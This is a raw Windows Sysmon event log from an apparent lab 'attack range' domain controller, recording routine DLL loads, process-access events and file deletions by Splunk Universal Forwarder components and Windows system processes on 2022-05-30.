Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x800000000000000098249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.042{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:50.322{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6D36BD852AA2E70BC7CB5104C83C001,SHA256=C3F22F053A3A6D2F45A35E664D99E94BD3323D5373B5572908BB120213057CE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.525{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=670E4DAEC17A9B56A385E3158D264EFB,SHA256=53B4B4EE867611BEC9F5DFD4C5E7F4A2B23995EF907F163B1F6B13D48C4BA077,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.416{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000098398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.416{326FD73D-C07B-6294-2D0B-000000005502}52366916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.416{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.416{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 